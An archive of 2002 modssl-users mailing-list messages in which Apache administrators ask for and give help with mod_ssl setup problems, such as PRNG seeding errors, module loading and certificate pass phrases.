Message-Id: <200211141025.gAEAPkQ15398@Iapetos.csfps.de>
Organization: Credit Suisse Financial Planning Solutions GmbH, D-55130 Mainz
To: modssl-users@modssl.org
Subject: Re: Is anyone successfully running OWA2K behind Apache/mod_ssl? 
In-reply-to: Your message of Thu, 07 Nov 2002 06:57:36 PST
X-Mailer: MH 6.8
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=ISO-8859-1
Date: Thu, 14 Nov 2002 11:25:36 +0100
From: Volker Borchert 
X-Scanned: Iapetos
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Volker Borchert 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

In message <42B8E37890B1E64CB427CE1F260181EAE335@mail00.sc.esilicon.com> you write:

|> 1. Obtain Apache Mod mod_proxy_add_forward.c
|>    Modify the code to set the header "font-end-https: on".
|> 
|>    add the following
|> 
|>    /* turn on front-end-https header, so OWA will put HTTPS into urls */ 
|>    ap_table_set(r->headers_in, "front-end-https","on");

Or modify modules/proxy/proxy_http.c. With apache-1.3.27/mod_ssl-2.8.12,
the relevant code section is at line 400 +/-. This is simpler, and will
avoid the problems with module order described in mod_proxy_add_forward.c

In addition, I would add a new config directive, say "FrontEndHTTPS"
of type "flag" to be able to control this on a per-vhost basis.

Maybe I'll give it a try next weekend.

(Anybody care to submit this as a feature request for future mod_ssl?)

	vb
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 15:50:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA21590; Thu, 14 Nov 2002 15:49:27 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA21521; Thu, 14 Nov 2002 15:48:08 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 93C304CE76B; Thu, 14 Nov 2002 15:48:12 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id ED2772879B; Thu, 14 Nov 2002 15:24:45 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bbmail1-out.unisys.com id OAA18472; Thu, 14 Nov 2002 14:39:28 +0100 (MET)
Received: from us-bb-gtwy-2.bb.unisys.com (us-bb-gtwy-2.bb.unisys.com [192.63.78.152])
	by bbmail1-out.unisys.com (8.9.3/8.9.3) with ESMTP id NAA01430
	for ; Thu, 14 Nov 2002 13:36:03 GMT
Received: by us-bb-gtwy-2.bb.unisys.com with Internet Mail Service (5.5.2655.55)
	id ; Thu, 14 Nov 2002 08:39:12 -0500
Message-ID: 
From: "Smith, Jim R" 
To: "'modssl-users@modssl.org'" 
Subject: MSIE Multiple Authentication Requests
Date: Thu, 14 Nov 2002 08:39:06 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Smith, Jim R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am looking for input on isolating/solving this issue.

I am running Apache/modssl/Verisign cert.
My PC using IE 6.0.26 and/or Netscape 7 has no problem.
Other users using IE 5.5, and 6.0.26 are asked repeatedly for
authentication.
It seems that the auth gets to the server when requested, but not back to
the browser.
Since it works for me, and my developer, I do not believe it is a
server-side problem.
Perhaps a browser setting, or Internet Zone setting, or intervening firewall
?

Anyone else have/had this problem ?
thanks,
jim
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 17:12:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA25867; Thu, 14 Nov 2002 17:11:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from typhoon.enabled.com id RAA25853; Thu, 14 Nov 2002 17:10:04 +0100 (MET)
Received: from typhoon.enabled.com (localhost.enabled.com [127.0.0.1])
	by typhoon.enabled.com (8.12.6/8.12.6) with ESMTP id gAEG8muR026974
	for ; Thu, 14 Nov 2002 08:08:48 -0800 (PST)
	(envelope-from sleek@enabled.com)
Received: from localhost (sleek@localhost)
	by typhoon.enabled.com (8.12.6/8.12.2/Submit) with ESMTP id gAEG8bLV026971
	for ; Thu, 14 Nov 2002 08:08:38 -0800 (PST)
	(envelope-from sleek@enabled.com)
X-Authentication-Warning: typhoon.enabled.com: sleek owned process doing -bs
Date: Thu, 14 Nov 2002 08:08:37 -0800 (PST)
From: Noah Garrett Wallach 
To: modssl-users@modssl.org
Subject: Re: modssl not running properly
In-Reply-To: <20021113171538.C42365-100000@typhoon.enabled.com>
Message-ID: <20021114080521.T42365-100000@typhoon.enabled.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah Garrett Wallach 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


okay I used s_client to trace the output - port 443 is just not running -
although I am starting apachectl with the startssl switch.

# openssl s_client -connect myhostname:443 -state -debug
connect: Connection refused
connect:errno=61

this is a FreeBSD 4.7 STABLE machine
and has Apache 1.3.27 and mod_ssl 2.8.12

what else can I tell you about this machine?


- Noah


On Wed, 13 Nov 2002, Noah Garrett Wallach wrote:

>
> HI,
>
> okay I just installed modssl apache on my freeBSD 4.7 STABLE box from the
> /usr/ports directory.  I am not able to go to the secure webserver that I
> defined in the httpsd.conf file.  Anybody want to help me figure out how
> to cure this issue?
>
> - Noah
>
>
>
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 17:22:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA26446; Thu, 14 Nov 2002 17:21:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id RAA26359; Thu, 14 Nov 2002 17:20:28 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gAEGKMt9008168
	for ; Thu, 14 Nov 2002 17:20:22 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gAEGKLOP029158
	for ; Thu, 14 Nov 2002 17:20:21 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: modssl not running properly
Date: Thu, 14 Nov 2002 17:20:21 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A517@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: modssl not running properly
Thread-Index: AcKL+MF6Za2mufRHTwiAow2OLJWbNgAAOTxA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Do you have "Listen 443", have you set up an SSL VH, does it say
anything in the SSL engine log, error_log etc..?

>-----Original Message-----
>From: Noah Garrett Wallach [mailto:sleek@enabled.com]
>Sent: Donnerstag, 14. November 2002 17:09
>To: modssl-users@modssl.org
>Subject: Re: modssl not running properly
>
>
>
>okay I used s_client to trace the output - port 443 is just 
>not running -
>although I am starting apachectl with the startssl switch.
>
># openssl s_client -connect myhostname:443 -state -debug
>connect: Connection refused
>connect:errno=61
>
>this is a FreeBSD 4.7 STABLE machine
>and has Apache 1.3.27 and mod_ssl 2.8.12
>
>what else can I tell you about this machine?
>
>
>- Noah
>
>
>On Wed, 13 Nov 2002, Noah Garrett Wallach wrote:
>
>>
>> HI,
>>
>> okay I just installed modssl apache on my freeBSD 4.7 STABLE 
>box from the
>> /usr/ports directory.  I am not able to go to the secure 
>webserver that I
>> defined in the httpsd.conf file.  Anybody want to help me 
>figure out how
>> to cure this issue?
>>
>> - Noah
>>
>>
>>
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 18:44:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA29451; Thu, 14 Nov 2002 18:43:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id SAA29397; Thu, 14 Nov 2002 18:42:43 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 14 Nov 2002 09:42:37 -0800
Received: from 168.179.102.67 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Thu, 14 Nov 2002 17:42:36 GMT
X-Originating-IP: [168.179.102.67]
From: "Manoj Kithany" 
To: modssl-users@modssl.org
Subject: Apache + mod_ssl - config/install
Date: Thu, 14 Nov 2002 17:42:36 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 14 Nov 2002 17:42:37.0033 (UTC) FILETIME=[387E6D90:01C28C05]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Experts!

I want to INSTALL and CONFIGURE my APACHE 1.3.27 for SSL. SO, I got mod_ssl 
from the site and installed it using
------------------------------------------------------------------------------------------------------------
#pwd
/opt/freeware/src/packages/SOURCES/mod_ssl-2.8.11-1.3.27

# ./configure --with-apache=../apache_1.3.27 
--with-ssl=/Downloads/openssl-0.9.6g --with-crt=/usr/local/ssl/bin/cert.cer 
--with-key=/usr/local/ssl/bin/private.key --prefix=/kit --enable-shared=ssl

#cd ..
#cd apache_1.3.27
#make
#make certificate
#make install
------------------------------------------------------------------------------------------------------------
This DOCUMENTATION was given in README file in the above directory.

Later when I check if my APACHE was configured for SSL by using:
------------------------------------------------------------------------------------------------------------
# ./httpd -l
Compiled-in modules:
http_core.c
mod_env.c
mod_log_config.c
mod_mime.c
mod_negotiation.c
mod_status.c
mod_include.c
mod_autoindex.c
mod_dir.c
mod_cgi.c
mod_asis.c
mod_imap.c
mod_actions.c
mod_userdir.c
mod_alias.c
mod_access.c
mod_auth.c
mod_so.c
mod_setenvif.c
suexec: disabled; invalid wrapper /kit/bin/suexec
#
------------------------------------------------------------------------------------------------------------

As Seen above, MOD_SSL Module is NOT LISTED above. When I 
Installed/configured (as shown above) I did not receive any ERROR - but 
still could NOT see if MOD_SSL was configured? Any suggestions/hints






_________________________________________________________________
MSN 8 with e-mail virus protection service: 2 months FREE* 
http://join.msn.com/?page=features/virus

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 18:57:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA29959; Thu, 14 Nov 2002 18:56:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id SAA29904; Thu, 14 Nov 2002 18:56:01 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA12197;
	Thu, 14 Nov 2002 12:55:34 -0500
Date: Thu, 14 Nov 2002 12:55:34 -0500 (EST)
From: "R. DuFresne" 
To: Manoj Kithany 
cc: modssl-users@modssl.org
Subject: Re: Apache + mod_ssl - config/install
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


you used --enable-shared=ss, so mod-ssl is a shared module, not part of
the core compiled in stuff in the httpd binary you made.  Now you have to
load the module in the httpd.conf file and configure the ssl related
settings to get it to run for you when you apachectl startssl.

Most the settings and directives should be in the default httpd.conf file
generated in the make;makeinstall, and await you editing refinements.  the
man pages and online documentation at the apche and mod-ssl sites should
guide you through any settings not clarified fully in the comments in the
default httpd.conf file


Thanks,

Ron DuFresne

On Thu, 14 Nov 2002, Manoj Kithany wrote:

> Hi Experts!
> 
> I want to INSTALL and CONFIGURE my APACHE 1.3.27 for SSL. SO, I got mod_ssl 
> from the site and installed it using
> ------------------------------------------------------------------------------------------------------------
> #pwd
> /opt/freeware/src/packages/SOURCES/mod_ssl-2.8.11-1.3.27
> 
> # ./configure --with-apache=../apache_1.3.27 
> --with-ssl=/Downloads/openssl-0.9.6g --with-crt=/usr/local/ssl/bin/cert.cer 
> --with-key=/usr/local/ssl/bin/private.key --prefix=/kit --enable-shared=ssl
> 
> #cd ..
> #cd apache_1.3.27
> #make
> #make certificate
> #make install
> ------------------------------------------------------------------------------------------------------------
> This DOCUMENTATION was given in README file in the above directory.
> 
> Later when I check if my APACHE was configured for SSL by using:
> ------------------------------------------------------------------------------------------------------------
> # ./httpd -l
> Compiled-in modules:
> http_core.c
> mod_env.c
> mod_log_config.c
> mod_mime.c
> mod_negotiation.c
> mod_status.c
> mod_include.c
> mod_autoindex.c
> mod_dir.c
> mod_cgi.c
> mod_asis.c
> mod_imap.c
> mod_actions.c
> mod_userdir.c
> mod_alias.c
> mod_access.c
> mod_auth.c
> mod_so.c
> mod_setenvif.c
> suexec: disabled; invalid wrapper /kit/bin/suexec
> #
> ------------------------------------------------------------------------------------------------------------
> 
> As Seen above, MOD_SSL Module is NOT LISTED above. When I 
> Installed/configured (as shown above) I did not receive any ERROR - but 
> still could NOT see if MOD_SSL was configured? Any suggestions/hints
> 
> 
> 
> 
> 
> 
> _________________________________________________________________
> MSN 8 with e-mail virus protection service: 2 months FREE* 
> http://join.msn.com/?page=features/virus
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 19:14:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA01538; Thu, 14 Nov 2002 19:13:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id TAA01509; Thu, 14 Nov 2002 19:12:18 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 14 Nov 2002 10:12:12 -0800
Received: from 168.179.102.67 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Thu, 14 Nov 2002 18:12:11 GMT
X-Originating-IP: [168.179.102.67]
From: "Manoj Kithany" 
To: modssl-users@modssl.org
Subject: Apache + mod_ssl (OpenSSL Error)
Date: Thu, 14 Nov 2002 18:12:11 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 14 Nov 2002 18:12:12.0248 (UTC) FILETIME=[5A9ABD80:01C28C09]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

when I start my Apache it shows following Error:
---------------------------------------------------------------------
# ./apachectl startssl
./apachectl startssl: httpd could not be started
#
---------------------------------------------------------------------

Later when I check /log/error_log file I see
---------------------------------------------------------------------
[Thu Nov 14 11:10:01 2002] [error] mod_ssl: Init: Failed to generate 
temporary 512 bit RSA private key (OpenSSL library error follows)
[Thu Nov 14 11:10:01 2002] [error] OpenSSL: error:24064064:random number 
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[Thu Nov 14 11:10:01 2002] [error] OpenSSL: error:04069003:rsa 
routines:RSA_generate_key:BN lib
---------------------------------------------------------------------

Please hepl me out on this!

THANKS!

_________________________________________________________________
The new MSN 8: smart spam protection and 2 months FREE*  
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 19:58:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03040; Thu, 14 Nov 2002 19:57:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from eigenvision.com id TAA03027; Thu, 14 Nov 2002 19:56:57 +0100 (MET)
Received: (qmail 15652 invoked from network); 14 Nov 2002 18:56:35 -0000
Received: from wml.eigenvision.com (HELO eigenvision.com) (192.168.0.2)
  by 0 with SMTP; 14 Nov 2002 18:56:35 -0000
Received: (qmail 15427 invoked by uid 2508); 14 Nov 2002 18:56:35 -0000
Received: from calvin-apache-ml@eigenvision.com by fourier by uid 500 with qmail-scanner-1.12 (uvscan: v4.1.60/v4210. hbedv: 6.12.0.0. inocucmd: 37.00/02.66. . Clear:. Processed in 0.113078 secs); 14 Nov 2002 18:56:35 -0000
X-Qmail-Scanner-Mail-From: calvin-apache-ml@eigenvision.com via fourier
X-Qmail-Scanner: 1.12 (Clear:. Processed in 0.113078 secs)
Date: Thu, 14 Nov 2002 13:56:35 -0500
From: PeterKorman 
To: modssl-users@modssl.org
Subject: Raw mbox archives?
Message-ID: <20021114185635.GC13865@eigenvision.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="Kj7319i9nmIyA2yE"
Content-Disposition: inline
User-Agent: Mutt/1.4i
X-GPG-Fingerprint: ECBA EA08 C3C1 251E 5FB5  D196 F8C8 F8B7 AB60 234D
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: PeterKorman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--Kj7319i9nmIyA2yE
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Are the archives for this list available as raw mbox files?
Thanks.

JPK

--Kj7319i9nmIyA2yE
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE90/Hj+Mj4t6tgI00RAvtVAJ4y6oN8atlriDEos6xaXn1E1GQm3gCeKHbJ
dSK3VXopfiTUVKhEBVqrqEI=
=T96V
-----END PGP SIGNATURE-----

--Kj7319i9nmIyA2yE--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 21:05:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA05187; Thu, 14 Nov 2002 21:04:34 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id VAA05149; Thu, 14 Nov 2002 21:03:58 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 14 Nov 2002 12:03:51 -0800
Received: from 168.179.102.67 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Thu, 14 Nov 2002 20:03:50 GMT
X-Originating-IP: [168.179.102.67]
From: "Manoj Kithany" 
To: modssl-users@modssl.org
Subject: PRNG??? /dev/random not present?
Date: Thu, 14 Nov 2002 20:03:50 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 14 Nov 2002 20:03:51.0052 (UTC) FILETIME=[F3671CC0:01C28C18]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I am using IBM AIX System and DO NOT have /dev/random device.
How do I set random pool to /dev/random? Also, on my IBM AIX box I have 
installed EGD /var/run/egd-pool

Any related info?

Thanks!









_________________________________________________________________
STOP MORE SPAM with the new MSN 8 and get 2 months FREE* 
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 14 23:53:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA11622; Thu, 14 Nov 2002 23:52:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id XAA11609; Thu, 14 Nov 2002 23:52:07 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 14 Nov 2002 14:52:00 -0800
Received: from 168.179.102.67 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Thu, 14 Nov 2002 22:52:00 GMT
X-Originating-IP: [168.179.102.67]
From: "Manoj Kithany" 
To: apache-ssl@lists.aldigital.co.uk, modssl-users@modssl.org,
        openssl-users@openssl.org
Subject: Apache + mod_ssl (OpenSSL Error)
Date: Thu, 14 Nov 2002 22:52:00 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 14 Nov 2002 22:52:00.0739 (UTC) FILETIME=[71532B30:01C28C30]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi Experts!

I want to INSTALL and CONFIGURE my APACHE 1.3.27 for SSL. I am using IBM AIX 
box.
So, I got mod_ssl from the IBM site and installed it in following way(after 
READing INSTALL file for 2 hrs;-(

------------------------------------------------------------------------
#pwd
/opt/freeware/src/packages/SOURCES/mod_ssl-2.8.11-1.3.27

# ./configure --with-apache=../apache_1.3.27 
--with-ssl=/Downloads/openssl-0.9.6g --with-crt=/usr/local/ssl/bin/cert.cer 
--with-key=/usr/local/ssl/bin/private.key --prefix=/kit --enable-shared=ssl

#cd ..
#cd apache_1.3.27
#make
#make certificate
#make install
------------------------------------------------------------------------
This DOCUMENTATION was given in README file in the above directory.

Later, I start my APACHE for SSL as shown below and get ERROR:
------------------------------------------------------------------------
#./apachectl startssl
./apachectl startssl: httpd could not be started
------------------------------------------------------------------------

So, I finally READ the LOG file "error_log" and checked it shows:
------------------------------------------------------------------------
[error] mod_ssl: Init: Failed to generate temporary 512 bit RSA private key 
(OpenSSL library error follows)
[error] OpenSSL: error:24064064:random number 
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN lib
------------------------------------------------------------------------

Do you know what this error would be? I have already installed EGD entrophy 
and is it stored in /dev/egd-pool
Any links/pointers on this is appreciated.

Thanks!

_________________________________________________________________
Tired of spam? Get advanced junk mail protection with MSN 8. 
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 15 01:51:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA18122; Fri, 15 Nov 2002 01:50:32 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itesm.mx id BAA18039; Fri, 15 Nov 2002 01:50:02 +0100 (MET)
Received: from uv (10.41.161.221) by itesm.mx (5.5.058)
        id 3DB564AD00212879 for modssl-users@modssl.org; Thu, 14 Nov 2002 18:49:57 -0600
From: "Roberto C. Torres Aguayo" 
To: 
Subject: problem setting up my cert
Date: Thu, 14 Nov 2002 18:51:15 -0600
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0004_01C28C0E.CF384F40"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Roberto C. Torres Aguayo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0004_01C28C0E.CF384F40
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 8bit

Hi everyone!

I´ve just installed  Apache Server in my box (Debian  2), I created my
private key with  password and I send my (server.CSR) to verisign, later
they send my server.crt, I follow the instructions to set up my server.key
and server.crt. (in my httpd.conf)

When I start apachessl, it ask for PEM pass Phrase, I typed the password but
I doesn´t run https and I got this error  /var/log/apache-ssl/error.log

[Thu Nov 14 17:52:10 2002] [crit] (22)Invalid argument: Error reading
private key file /etc/apache/nuevo/server.key:
[Thu Nov 14 17:52:10 2002] [crit] error:0906406D:PEM
routines:DEF_CALLBACK:problems getting password
[Thu Nov 14 17:52:10 2002] [crit] error:0906A068:PEM
routines:PEM_do_header:bad password read

these is what I wrote in httpd.conf
# Point SSLCertificateFile at a PEM encoded certificate.
# If the certificate is encrypted, then you will be prompted for a pass
phrase.
# Note that a kill -1 will prompt again.
# A test certificate can be generated with "make certificate".
#modified by Robert    ########################
#SSLCertificateFile /etc/apache-ssl/apache.pem  <---this is the original
cert
#SSLCertificateFile /u/ben/apache/apache_1.2.6-ssl/SSLconf/conf/t1.pem
SSLCertificateFile /etc/apache/nuevo/server.crt
SSLCertificateKeyFile /etc/apache/nuevo/server.key

the password is correct, actualy i open server.key with openssl and the PEM
phrase, but when i start the server doesn´t work

Any help is appreciated.
Thanks in advance

Robert

------=_NextPart_000_0004_01C28C0E.CF384F40
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable



















Hi everyone!



 



I=B4ve just installed =A0Apache Server in my box (Debian =
=A02), I created my private key with =
=A0password and I send my =
(server.CSR) to verisign,
later they send my server.crt, I follow the instructions to set up my
server.key and server.crt. (in my =
httpd.conf)



 



When I start apachessl, it =
ask for PEM
pass Phrase, I typed the password but I doesn=B4t run https and I got =
this error =A0/var/log/apache-ssl/error.log =




 



[Thu Nov 14 17:52:10 2002] =
[crit]
(22)Invalid argument: Error reading private key file
/etc/apache/nuevo/server.key:



[Thu Nov 14 17:52:10 2002] =
[crit]
error:0906406D:PEM routines:DEF_CALLBACK:problems getting =
password



[Thu Nov 14 17:52:10 2002] =
[crit]
error:0906A068:PEM routines:PEM_do_header:bad password =
read



 



these
is what I wrote in httpd.conf 



# Point
SSLCertificateFile at a PEM encoded certificate.



# If
the certificate is encrypted, then you will be prompted for a pass =
phrase.



# Note
that a kill -1 will prompt again.



# A
test certificate can be generated with "make =
certificate".



#modified
by Robert=A0=A0=A0 =
########################



#SSLCertif=
icateFile
/etc/apache-ssl/apache.pem=A0 =
=DF-this is
the original cert



#SSLCertificateFile
/u/ben/apache/apache_1.2.6-ssl/SSLconf/conf/t1.pem<=
/p>


SSLCertificateFile =
/etc/apache/nuevo/server.crt<=
/p>


SSLCertificateKeyFile
/etc/apache/nuevo/server.key<=
/p>


 <=
/p>


the
password is correct, actualy i open server.key with openssl and the PEM =
phrase,
but when i start the server doesn=B4t work



 



Any
help is appreciated.



Thanks
in advance



 



Robert









------=_NextPart_000_0004_01C28C0E.CF384F40--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
